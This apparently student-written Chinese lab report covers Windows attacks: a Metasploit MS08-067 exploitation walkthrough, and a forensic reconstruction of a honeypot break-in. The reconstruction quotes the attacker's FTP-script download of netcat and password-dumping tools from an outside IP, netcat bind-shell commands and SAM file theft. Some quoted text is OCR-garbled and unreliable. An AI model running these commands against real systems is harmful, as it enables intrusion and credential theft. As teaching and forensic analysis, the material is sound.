20212923 2021-2022-2 《網絡攻防實踐》第六次作業
實踐六:Windows操作系統安全攻防
課程:《網絡攻防實踐》
班級: 2129
姓名: 王文彬
學號:20212923
實驗教師:王志強
實驗日期:2022年04月24日
必修/選修: 選修
一.實踐內容
1. 實踐要求介紹
- 動手實踐Metasploit windows attacker
- 使用windows Attacker/BT4攻擊機嘗試對windows Metasploitable靶機上的MS08-067漏洞進行遠程滲透攻擊,獲取目標主機的訪問權
- 取證分析實踐:解碼一次成功的NT系統破解攻擊
- 來自212.116.251.162的攻擊者成功攻陷了一臺由rfp部署的蜜罐主機172.16.1.106,(主機名爲lab.wiretrip.net),要求提取並分析攻擊的全部過程
- 攻擊者使用了什麼破解工具進行攻擊;
- 攻擊者如何使用這個破解工具進入並控制了系統;
- 攻擊者獲得系統訪問權限後做了什麼;
- 攻擊者獲得系統訪問權限後做了什麼;
- 你覺得攻擊者是否警覺了他的目標是一臺蜜罐主機?如果是,爲什麼
- 來自212.116.251.162的攻擊者成功攻陷了一臺由rfp部署的蜜罐主機172.16.1.106,(主機名爲lab.wiretrip.net),要求提取並分析攻擊的全部過程
- 團隊對抗實踐:windows系統遠程滲透攻擊和分析
- 攻方使用metasploit選擇漏洞進行攻擊,獲得控制權。(要求寫出攻擊方的同學信息、使用漏洞、相關IP地址等);
- 防守方使用wireshark監聽獲得的網絡數據包,分析攻擊過程,獲取相關信息。
普通網絡服務查點
-
DNS服務
- DNS區域傳送
- nslookup:default server
- ls -d Domain_DNS_NAME
- 阻斷DNS區域傳送
- MMC控制檯配置DNS服務去掉Allow Zone Transfers,禁止區域傳送
- DNS區域傳送
-
主機查點-NetBIOS網絡查點
-
使用net view查點域
- 列出網絡上的工作組和域: net view / domain;
- 列出指定組/域中的所有計算機:net view /domain:DOMAIN_NAME;
-
識別域控制器
- nltest /dclist:DOMAIN_NAME
-
查看NetBIOS名字表
-
列舉: 自帶工具nbtstat -A TARGET_IP;
-
掃描: 免費工具nbtscan
-
-
-
Windows系統遠程攻擊
- Windows獨有組網協議和服務
- SMB(遠程口令猜測)MSRPC,LSASS;
- 各種網絡服務在Windows平臺的具體實現
- IIS, MS SQL Server,遠程桌面
- 社會工程學、 攻擊客戶端軟件等
-
遠程口令字猜測
-
Windows文件與打印共享服務-SMB
- TCP 139: NetBIOS Session Service
- TCP 445: SMB over HTTP直連主機服務
-
攻擊點:默認開放的隱藏共享卷
- IPC$:進程間通信
-
目標系統用戶名單
- 通過查點方法收集用戶帳戶信息:dumpsec
- 內建用戶:Guest, Administrator
-
自動方式
- FOR批處理
- 免費軟件: Legion、 NetBIOS Auditing Tool
- 商業軟件: SMBGrind (併發,快速)
- 國內軟件: XScan, 小椿軟件之流光
-
口令字猜測方法
- 空白口令
- 弱口令(高概率組合)
- 字典攻擊
- 暴力破解
-
-
遠程口令字防禦策略
- 網絡防火牆:限制TCP139/445端口訪問
- 主機級安防機制限制對SMB的訪問
- IPSec過濾器
- Windows防火牆
- 禁用SMB服務放棄Windows文件和打印共享
- 制定和實施強口令字策略
- 設置帳戶鎖定闕值
- 激活帳戶登錄失敗事件審計功能,定期查看EventLog
- 用入侵檢測/防禦系統進行實時報警和防禦
2.實踐過程
實踐一:動手實踐Metasploit windows attacker
機器 | IP地址 |
---|---|
Kali Linux | 192.168.200.69 |
windows2k | 192.168.200.124 |
(1)我們首先需要確保攻擊機和靶機之間能夠進行互通,相互發送ICMP包進行測試:
(2)在命令行中輸入msfconsole,打開直接打開Metasploit:
(3)輸入search MS08_067查看該漏洞信息
(4)輸入use exploit/windows/smb/ms08_067_netapi選擇使用相關腳本,使用set payload generic/shell_reverse_tcp選擇你要用的攻擊負載模塊:
(5)我們可以通過使用show options查看當前攻擊腳本所需要設置的參數;
(6)使用set RHOST 192.168.13.9設置靶機爲win2k,set LHOST 192.168.13.8設置攻擊機爲kali,再show options查看是否配置成功,如圖:
(7)輸入exploit開始攻擊,要注意目標主機的445端口要開放,查看445端口是否開放之後,如果沒有開放,則需要開啓445端口。攻擊成功之後輸入若干命令進行測試:
實踐二:取證分析實踐:解碼一次成功的NT系統破解攻擊
使用wireshark打開[email protected],大致瀏覽文件後,可以發現日誌文件由以下內容組成:
- 可識別的HTTP協議內容
- 可識別的SQL語言代碼內容
= 可識別的系統操作代碼內容- 不可識別的數據(二進制數據)
- 攻擊場景
- 被攻擊目標: rfp的個人網站(lab.wiretrip.net),基千NT和11S;
- 攻擊者:來自 213.116.251.162
- Unicode漏洞 CMS00-078/MSOl-026)
- Google "WEB-11S MDAC Content-Type overflow attempt"
- MDAC RDS漏洞 CMS02-065
- 攻擊者可能利用了11S的Unicode漏洞和MDACRDS組件漏洞攻陷了蜜罐主機;
並通過netcat構建了遠程shell連接 - Unicode攻擊原理解釋
- 利用微軟IIS4.0和5.0都存在利用擴展UNICODE字元取代“\”和“/”,而能利用“../”目錄遍歷的漏洞。
- 未經授權的用戶可能利用IUSR_machinename賬號的上下文空間訪問任何已知的文件。
(1)攻擊者使用了什麼破解工具進行攻擊
- 從攻擊主機X首先訪問了蜜罐T上的http://lab.wiretrip.net/Default.htm頁面
- 其User-Agent域設置爲Mozilla/4.0
- Accept字段中顯示訪問主機安裝了MS word等軟件;
- 推測主機應爲NT5.0系統,安裝了MSIE5.01和Hotbar2.0插件。
- 攻擊者利用了Unicode攻擊(針對MSOO-078/MSOl-026) 和針對msadcs.dll中RDS漏洞 (MS02-065)的msadc.pl/msadc2.pl滲透攻擊工具進行了攻擊。如下圖:
(2)攻擊者如何使用這個破解工具進入並控制了系統
- 階段一:
- 通過FTP腳本嘗試在目標主機下載工具(pdump/samdump/netcat)由於記錯口令失敗,如下圖:
- 多次嘗試編寫FTP腳本出錯, 失敗;
- SESSION: 1874-SO"copy C:\winnt\syste m32\cmd.exe cmdl.exe"
- SESSION:1875-SO"cmdl.exe /c open 213.116 .251.162 >ftpcom"
- SESSION:1876-SO"cmdl.exe /c echo johna2k >>ftpcom"
- SESSION:1877-SO"cmdl.exe /cecho haxedjOO >>ftpcom"
- SESSION:1879-SO"cmdl.exe /cecho get nc.exe >>ftpcom"
- SESSION:1880-SO"cmdl.exe /cecho get pdum p.exe >>ftpcom"
- SESSION:1881-SO"cmdl.exe /cecho get samdum p.dll >>ft pcom"
- SESSION:1882-SO"cmdl.exe /cecho quit >>ftpcom"
- SESSION:1885-SO"cmdl.exe /cftp -s:ftpcom"
- 階段二:
- 通過Netcat獲得遠程訪問shell, 正式獲得遠程訪問權
- SESSION:1887-SO"cmdl.exe /c nc -I -p 6969 -e cmdl.exe"
- 20:42:47 X: 1888 -> T:6969 incomin g NC cmd.exe sessi on: see./log/ 17 2.16.1.106/SESSION :6969-1888
- 通過Netcat獲得遠程訪問shell, 正式獲得遠程訪問權
(3)攻擊者獲得系統訪問權限後做了什麼
-
本地權限提升
- 攻擊者目前獲取的遠程訪問權限
- IIS啓動帳戶: IUSR_machimachinename;
- 能夠通過MDACRDS以SYSTEM賬號權限運行任意指令;
- 攻擊者目標: 獲取本地Administrator權限
- 攻擊者目前獲取的遠程訪問權限
-
本次權限提升-刺探用戶組信息
-
本地權限提升-再次嘗試pdump
- 再次嘗試pdump
- 20:58:08 X:1888 -> T:6969 interactive (netcat): 'pdump' ,仍然失敗
- 放棄pdump
- 21:05:27 X:1888 -> T:6969 interactive (netcat):'delpdump.exe' and 'del samdump.dll'
- 21:05:27 X:1888 -> T:6969 interactive (netcat):'delpdump.exe' and 'del samdump.dll'
- 再次嘗試pdump
-
本地權限提升-獲取SAM備份
-
rdisk /s-備份關鍵信息,在\repair目錄中就會創建一個名爲sam._的SAM壓縮拷貝,備份的san._文件在使用之前需要通過expand進行擴展。
-
開啓另外一個Netcat遠程shell
- 21:10:42X:1987-> T:80 exec (unicode)'nc -I -p 6969 -e cmdl.exe'
- 21:10:46X:1988-> T:6969failed (RST) incoming netcat session
- 21:10:54X:1989-> T:6969 failed again
- 21:11:19X:1992-> T:80 exec (unicode) nc -1 -p 6968-e cmdl.exe
- 21:11:24X:1993-> T:6968 incoming NC cmd.exe session: see./log/ 17 2.16.1.106/SESSION :6969-1888
-
將SAM備份文件拷貝至IIS的根目錄inetpub, 並通過Web方式下載了該文件
- 21:12:22X:1993-> T:6968 interactive (netcat): copies;c:\har.txt to inetpub
- 21:12:32X:1995-> T:80 get /har.txt (sam._)
- 21:15:23X:1998-> T:80 exec (msadc):'del c: \i net pub\ wwwroot\har. txt';c:\inetpub\wwwroot\har.txt'
- 21:16:32T:6968-> X:1993 second nc session ends
-
攻擊機上使用 LOphtcrack進行口令字破解: `SOuthP',完成權限提升
-
(4)如何防止這樣的攻擊?
- 直接防禦措施:打補丁
- Unicode - http://www.microsoft.com/technet/securitv /bulletin/ms00-057.asp
- RDS - htto:/ /www.microsoft.com/technet/securitv /Bulletin/ MS02-065.msox
- 進一步防禦措施:IIS安全防範措施
- 爲這些漏洞打上補丁
- 禁用用不着的RDS等服務
- 防火牆封禁網絡內部服務器發起的連接
- 爲webserver在單獨的文件捲上設置虛擬根目錄
- 使用NTFS文件系統, 因爲FAT幾乎不提供安全功能
- 使用IIS Lockdown 和 URLScan 等工具加強web server
(5)攻擊者是否警覺了他的目標
- 攻擊者意識到了他的目標是作爲蜜罐主機的;
- 攻擊者建立了一個文件,並且輸入瞭如下內容
- 因爲該目標主機作爲rfp的個人網站,Web服務所使用的IIS甚至沒有更新rfp自己所發現的MDAC RDS安全漏洞,很容易讓攻擊者意識到這是個誘餌。
實踐三:團隊對抗實踐:windows系統遠程滲透攻擊和分析
本方攻擊機及IP | 本方靶機及IP | 對方攻擊機及IP | 對方靶機及IP |
---|---|---|---|
Kali Linux 192.168.116.127 | Windows2k 192.168.116.66 | Kali Linux 192.168.116.127 | Windows2k 192.168.116.71 |
攻擊方實踐
(1)打開msfconsole,選擇相應攻擊腳本、負載,設置腳本所需要的參數;
(2)輸入exploit進行攻擊後,我們在靶機方創建了一個名叫wjswez
的文件夾
靶機方實踐
(1)作爲靶機,我們可以打開wireshark進行等待抓包
(2)我們可以看到攻擊機在靶機的445端口建立連接;
(3)一些SMB協議數據包;
(4)可以看到攻擊機在我方靶機上創建了一個文件夾,然後結束本次攻擊。
二、 實驗過程中遇到的問題和解決過程
1. 配置windoes橋接時,出現找不到vmnet0網卡的情況
- 我們需要在關閉所有虛擬機的前提下進行對網卡的初始化,對vmware網卡重新進行安裝。ps:需要在服務中開啓
Devise install Devise
服務.
三、感想
在此次實踐中,能夠充分理解攻擊靶機漏洞的機理,同時也在分析攻擊過程中,學習到了不同角色間,需要做的相關工作。